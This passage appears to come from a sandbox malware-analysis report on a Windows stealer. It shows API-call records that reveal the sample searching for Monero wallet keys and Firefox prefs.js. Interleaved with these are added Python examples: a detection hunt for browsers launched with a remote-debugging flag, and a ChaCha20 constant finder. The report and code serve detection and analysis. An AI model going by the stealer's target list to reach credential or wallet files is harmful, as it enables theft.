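    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\file.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r'--remote-debugging-port=9229 --profile-directory="Default"'},
    {"Image": r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe",
     "ParentImage": r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe",
     "CommandLine": r'"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" '
                    r'--remote-debugging-port=9229'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe --remote-debugging-port=9229"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Only the second constructed event is rated high: chrome.exe started from an executable in the user's Temp directory with the exact flag pair from the string table. The port number is captured rather than hard-coded to 9229 because the flag accepts any port; matching on the flag, not the value, is what keeps the check useful against a rebuilt sample.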
                                      APIs
                                      • wsprintfA.USER32 ref: 00F23B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F23B33
                                      • lstrcat.KERNEL32(?,?), ref: 00F23B85
                                      • StrCmpCA.SHLWAPI(?,00F30F58), ref: 00F23B97
                                      • StrCmpCA.SHLWAPI(?,00F30F5C), ref: 00F23BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F23EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00F23ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-2524465048
                                      • Opcode ID: ba2c78c4e6bd324619b0714530c173909e1e4c5d88d1c2bd12ee142fe3fd25db
                                      • Instruction ID: 500470575028964f085c13a8c5af1654c6205beef48aafb6a2a6a692500c0b97
                                      • Opcode Fuzzy Hash: ba2c78c4e6bd324619b0714530c173909e1e4c5d88d1c2bd12ee142fe3fd25db
                                      • Instruction Fuzzy Hash: C3A162B1A002189BDB34DFA4DC85FEE73B9BB84300F044598F61D9A185DB749B88DF92
                                      APIs
                                      • wsprintfA.USER32 ref: 00F24B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F24B93
                                      • StrCmpCA.SHLWAPI(?,00F30FC4), ref: 00F24BC1
                                      • StrCmpCA.SHLWAPI(?,00F30FC8), ref: 00F24BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F24DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00F24DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*
                                      • API String ID: 180737720-445461498
                                      • Opcode ID: 5fe69cef4055b3b5f774f315a86e6f13a2c022b115b08099062f8ba84ea14eec
                                      • Instruction ID: 7b6ed377449e1eb9f450d64fc9b0e561c0fba69f50e1f8607537f649efb88f0e
                                      • Opcode Fuzzy Hash: 5fe69cef4055b3b5f774f315a86e6f13a2c022b115b08099062f8ba84ea14eec
                                      • Instruction Fuzzy Hash: 1D613272900219ABDB34EBE0EC55FEA73BCBB48700F404598F61996184EB74EB84DF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F247D0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F247D7
                                      • wsprintfA.USER32 ref: 00F247F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F2480D
                                      • StrCmpCA.SHLWAPI(?,00F30FAC), ref: 00F2483B
                                      • StrCmpCA.SHLWAPI(?,00F30FB0), ref: 00F24851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F248DB
                                      • FindClose.KERNEL32(000000FF), ref: 00F248F0
                                      • lstrcat.KERNEL32(?,01D8E9C8), ref: 00F24915
                                      • lstrcat.KERNEL32(?,01D8D9C0), ref: 00F24928
                                      • lstrlen.KERNEL32(?), ref: 00F24935
                                      • lstrlen.KERNEL32(?), ref: 00F24946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 671575355-2848263008
                                      • Opcode ID: 4e83021593455fbffdb62c7ca3f5c0a64232242f0e59640560db91de35fba3a6
                                      • Instruction ID: f0e215ef60de0eed9a4c47e9c0132381386a6b7bb04ae70f666e2bc23e70b2c1
                                      • Opcode Fuzzy Hash: 4e83021593455fbffdb62c7ca3f5c0a64232242f0e59640560db91de35fba3a6
                                      • Instruction Fuzzy Hash: F55143B19002189BDB24EBF0DC99FE973BDAB58700F404598F61996184EB74EBC4DF91
                                      APIs
                                      • wsprintfA.USER32 ref: 00F24113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F2412A
                                      • StrCmpCA.SHLWAPI(?,00F30F94), ref: 00F24158
                                      • StrCmpCA.SHLWAPI(?,00F30F98), ref: 00F2416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F242BC
                                      • FindClose.KERNEL32(000000FF), ref: 00F242D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 8226048f11d3ee66cfc6bcdb4cd2993250b5c7683301b33f3429f11ac7f3d3cc
                                      • Instruction ID: cf1858f5e357c6f8a94815999c694e8356829b5c333957eb91b675b17dc4868a
                                      • Opcode Fuzzy Hash: 8226048f11d3ee66cfc6bcdb4cd2993250b5c7683301b33f3429f11ac7f3d3cc
                                      • Instruction Fuzzy Hash: E05166B1900219ABDB24EBF0EC85EEA737CBB58300F404598F61996084DB75ABC5DF91
                                      APIs
                                      • wsprintfA.USER32 ref: 00F1EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00F1EE55
                                      • StrCmpCA.SHLWAPI(?,00F31630), ref: 00F1EEAB
                                      • StrCmpCA.SHLWAPI(?,00F31634), ref: 00F1EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 00F1F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 545d1afd87840bd0d9eafdf1dc0cc1c2eb483d51560983cb61241c16a8503415
                                      • Instruction ID: a04993f0ced5b0140884700c6c2b47a05f5840dcf66c40774e3f7a7687c5a623
                                      • Opcode Fuzzy Hash: 545d1afd87840bd0d9eafdf1dc0cc1c2eb483d51560983cb61241c16a8503415
                                      • Instruction Fuzzy Hash: 4CE110729111289BDB55FB60EC62EEE7339BF54310F4045E9B40A62092EF386F89DF52
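The record that follows (source file ...0000000000F3C000..., no API calls) carries nothing but string fragments: expa, nd 3, 2-by, te k, expand 32-by and fused runs of the same. Together they are the 16-byte constant "expand 32-byte k" that Salsa20 and ChaCha20 place in the first four words of their state when keyed with 256 bits. A compiler that initialises that state with immediate dword stores emits the constant as four separate 4-byte values, and a string scanner then reports it as exactly these four-character pieces; the contiguous "expand 32-by" hit shows it is also present as a literal. The report does not say which of the two ciphers the sample implements or what it encrypts with it. What follows is an added example, not code from this report or from the analysed sample: it locates the constant in a byte blob in both forms, and it implements the ChaCha20 block function from RFC 8439 with those same four words in state[0..3], checked against the RFC's section 2.3.2 test vector. The blob is constructed; the mov-immediate encoding it contains is there only to make the split form concrete.

```python
"""Find the Salsa20/ChaCha20 'sigma' constant in a binary and show what it initialises.

Added example; not code from the Joe Sandbox report or from the analysed sample.
BLOB is constructed: it embeds the constant once as four separate little-endian
dword immediates (as a compiler emits a state initialisation, which a string
table shows as "expa" / "nd 3" / "2-by" / "te k") and once contiguously.
"""
import struct
from typing import Dict, List

SIGMA = b"expand 32-byte k"                    # 256-bit-key constant shared by Salsa20 and ChaCha20
SIGMA_WORDS = struct.unpack("<4I", SIGMA)       # (0x61707865, 0x3320646e, 0x79622d32, 0x6b206574)
MASK = 0xFFFFFFFF


def _offsets(blob: bytes, needle: bytes) -> List[int]:
    """Every (possibly overlapping) offset of needle in blob."""
    out, start = [], 0
    while True:
        i = blob.find(needle, start)
        if i == -1:
            return out
        out.append(i)
        start = i + 1


def find_sigma(blob: bytes) -> Dict[str, List[int]]:
    """Offsets of the constant as a contiguous 16-byte string and as individual dwords.

    Dword hits that lie inside a contiguous hit are not reported a second time."""
    contiguous = _offsets(blob, SIGMA)
    dwords = []
    for word in SIGMA_WORDS:
        for i in _offsets(blob, struct.pack("<I", word)):
            if not any(c <= i < c + len(SIGMA) for c in contiguous):
                dwords.append(i)
    return {"contiguous": contiguous, "dword": sorted(dwords)}


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _quarter_round(s: List[int], a: int, b: int, c: int, d: int) -> None:
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """RFC 8439 ChaCha20 block function; SIGMA_WORDS occupy state words 0..3."""
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("ChaCha20 needs a 32-byte key and a 12-byte nonce")
    state = (list(SIGMA_WORDS) + list(struct.unpack("<8I", key))
             + [counter & MASK] + list(struct.unpack("<3I", nonce)))
    work = state[:]
    for _ in range(10):                         # 20 rounds = 10 column/diagonal double-rounds
        _quarter_round(work, 0, 4, 8, 12); _quarter_round(work, 1, 5, 9, 13)
        _quarter_round(work, 2, 6, 10, 14); _quarter_round(work, 3, 7, 11, 15)
        _quarter_round(work, 0, 5, 10, 15); _quarter_round(work, 1, 6, 11, 12)
        _quarter_round(work, 2, 7, 8, 13); _quarter_round(work, 3, 4, 9, 14)
    return struct.pack("<16I", *[(w + s) & MASK for w, s in zip(work, state)])


# Constructed blob: a few filler bytes, then four "mov dword [ebp-disp8], imm32"
# stores (C7 45 disp8 imm32) carrying the constant word by word, then the
# constant once more as a single contiguous string.
BLOB = (
    b"\x55\x8b\xec\x83\xec\x40"
    + b"\xc7\x45\xc0" + struct.pack("<I", SIGMA_WORDS[0])
    + b"\xc7\x45\xc4" + struct.pack("<I", SIGMA_WORDS[1])
    + b"\xc7\x45\xc8" + struct.pack("<I", SIGMA_WORDS[2])
    + b"\xc7\x45\xcc" + struct.pack("<I", SIGMA_WORDS[3])
    + b"\x00" * 8
    + SIGMA
)

if __name__ == "__main__":
    print(find_sigma(BLOB))
    # RFC 8439 section 2.3.2 vector: key 00..1f, counter 1, nonce 00 00 00 09 00 00 00 4a 00 00 00 00
    print(chacha20_block(bytes(range(32)), 1, bytes.fromhex("000000090000004a00000000")).hex())
```

The dword search is the one that matters when triaging a string listing like the one below: a scanner that only looks for the whole 16-byte literal misses the immediate-store form, and a scanner that only looks for the words reports the literal four times. The same four words also identify Salsa20, so a hit narrows the cipher family, not the cipher; the round structure (quarter-round rotations 16/12/8/7 for ChaCha, 7/9/13/18 for Salsa20) is what separates them.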
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                       • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                      • API String ID: 0-1562099544
                                      • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction ID: ffcbcaf7f20ca6009c77d6dd40cd8ffe00504aa07545daa6a1ebc456bd7d8707
                                      • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                      • Instruction Fuzzy Hash: DDE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F316B0,00F30D97), ref: 00F1F81E
                                      • StrCmpCA.SHLWAPI(?,00F316B4), ref: 00F1F86F
                                      • StrCmpCA.SHLWAPI(?,00F316B8), ref: 00F1F885
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1FBB1
                                      • FindClose.KERNEL32(000000FF), ref: 00F1FBC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: prefs.js
                                      • API String ID: 3334442632-3783873740
                                      • Opcode ID: cba0966693a7bf826206b69b5275dc97d4b289163328d02bfd902c124d371deb
                                      • Instruction ID: 7ea34970a6d5bf1172f0ec397deb6fc05a1435613e5d3eccaba4087c3b7d2986
                                      • Opcode Fuzzy Hash: cba0966693a7bf826206b69b5275dc97d4b289163328d02bfd902c124d371deb
                                      • Instruction Fuzzy Hash: 99B115719001189BCB24FF64EDA6FED7379AF94300F4085A8E50A57191EF389B89DF92
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F3523C,?,?,?,00F352E4,?,?,00000000,?,00000000), ref: 00F11963
                                      • StrCmpCA.SHLWAPI(?,00F3538C), ref: 00F119B3
                                      • StrCmpCA.SHLWAPI(?,00F35434), ref: 00F119C9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F11D80
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F11E0A
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F11E60
                                      • FindClose.KERNEL32(000000FF), ref: 00F11E72
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID: \*.*
                                      • API String ID: 1415058207-1173974218
                                      • Opcode ID: 21314810c85695bd8d3ac23a2425e0da01fdf00bdf6ee1d2afdfe979aa6fc66c
                                      • Instruction ID: 497477f0e4db09972b435dd3b1acc82ec1fc0c61f8bbd71c4db383c4682fa4e5
                                      • Opcode Fuzzy Hash: 21314810c85695bd8d3ac23a2425e0da01fdf00bdf6ee1d2afdfe979aa6fc66c
                                      • Instruction Fuzzy Hash: 1812F3719501289BCB19FB60ECA6EEE7379BF54300F4045D9B50A66091EF386F88DF62
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F30C32), ref: 00F1DF5E
                                      • StrCmpCA.SHLWAPI(?,00F315C0), ref: 00F1DFAE
                                      • StrCmpCA.SHLWAPI(?,00F315C4), ref: 00F1DFC4
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1E4E0
                                      • FindClose.KERNEL32(000000FF), ref: 00F1E4F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2325840235-1173974218
                                      • Opcode ID: 01f60f6817b0647edb91a129fd19553601a320f2c169deeef8c949f417b892ad
                                      • Instruction ID: 401ff3b7dbf0f7cbf10b45f7e7db811cd4c4c9be234228d0e11a4c2c946cde13
                                      • Opcode Fuzzy Hash: 01f60f6817b0647edb91a129fd19553601a320f2c169deeef8c949f417b892ad
                                      • Instruction Fuzzy Hash: 65F1C1719101289BCB2AFB60EDA6EEE7379BF54300F4045D9B41A62091EF346F89DF52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: &~v$>#}k$A}~$Q*ms$RPk$jtvo$uBw$uBw$M}n$T~
                                      • API String ID: 0-1525655503
                                      • Opcode ID: a2a5df0bd5429903754bd57aa0f073d8607f9c65ef52a1224589d338452ebb70
                                      • Instruction ID: 99ed3caa3141dd99a948dd3f70ad8a3a0cf18e30e3d730c2d8e9abd44931513a
                                      • Opcode Fuzzy Hash: a2a5df0bd5429903754bd57aa0f073d8607f9c65ef52a1224589d338452ebb70
                                      • Instruction Fuzzy Hash: 62B207F3A0C2009FE3046E2DEC8566ABBE9EF98720F16493DE6C5D3744E63598058797
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
